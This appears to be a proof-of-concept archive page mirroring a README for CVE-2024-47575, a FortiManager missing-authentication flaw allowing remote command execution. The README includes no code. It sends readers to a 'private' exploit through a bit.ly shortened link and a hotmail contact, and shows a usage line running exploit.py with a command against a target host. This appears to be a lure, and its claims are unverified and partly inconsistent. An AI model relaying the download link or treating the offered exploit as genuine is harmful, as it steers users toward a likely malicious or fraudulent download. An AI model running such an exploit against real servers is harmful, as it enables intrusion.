Associated Vulnerability
Title:Fortinet FortiManager 访问控制错误漏洞 (CVE-2024-47575)Description:A missing authentication for critical function in FortiManager 7.6.0, FortiManager 7.4.0 through 7.4.4, FortiManager 7.2.0 through 7.2.7, FortiManager 7.0.0 through 7.0.12, FortiManager 6.4.0 through 6.4.14, FortiManager 6.2.0 through 6.2.12, Fortinet FortiManager Cloud 7.4.1 through 7.4.4, FortiManager Cloud 7.2.1 through 7.2.7, FortiManager Cloud 7.0.1 through 7.0.12, FortiManager Cloud 6.4.1 through 6.4.7 allows attacker to execute arbitrary code or commands via specially crafted requests.
Description
CVE-2024-47575: FortiManager Missing Authentication
Readme
# CVE-2024-47575: FortiManager Missing Authentication
## Overview
CVE-2024-47575 involves a lack of authentication for a critical function in FortiManager, which enables an attacker to execute arbitrary code or commands through specifically crafted requests.
## Exploit:
## [Download here](https://bit.ly/3C5MpDf)
## Details
+ **CVE ID**: CVE-2024-47575
+ **Published**: 2024-10-23
+ **Impact**: Confidentiality
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
CVE-2024-47575 is a significant vulnerability in the FortiManager platform that specifically impacts its fgfmsd daemon. Identified as CWE-306, this issue arises from inadequate authentication for management functions within the fgfmsd service, responsible for facilitating communication between FortiManager and FortiGate devices.
This vulnerability enables a remote attacker to send specially crafted requests, circumvent access controls, and execute arbitrary commands on the FortiManager system, which could jeopardize the security of the network.
## Affected Versions
FortiManager 7.6.0, FortiManager 7.4.0 through 7.4.4, FortiManager 7.2.0 through 7.2.7, FortiManager 7.0.0 through 7.0.12, FortiManager 6.4.0 through 6.4.14, FortiManager 6.2.0 through 6.2.12, Fortinet FortiManager Cloud 7.4.1 through 7.4.4, FortiManager Cloud 7.2.1 through 7.2.7, FortiManager Cloud 7.0.1 through 7.0.13, FortiManager Cloud 6.4.1 through 6.4.7
## Running
To run exploit you need Python 3.9. Execute:
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```


## Contact
For inquiries, please contact: Fruktolz21@hotmail.com
File Snapshot
[4.0K] /data/pocs/106e087f80f05bba55920fc5252dc52be6545b7b
└── [1.8K] README.md
0 directories, 1 file
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →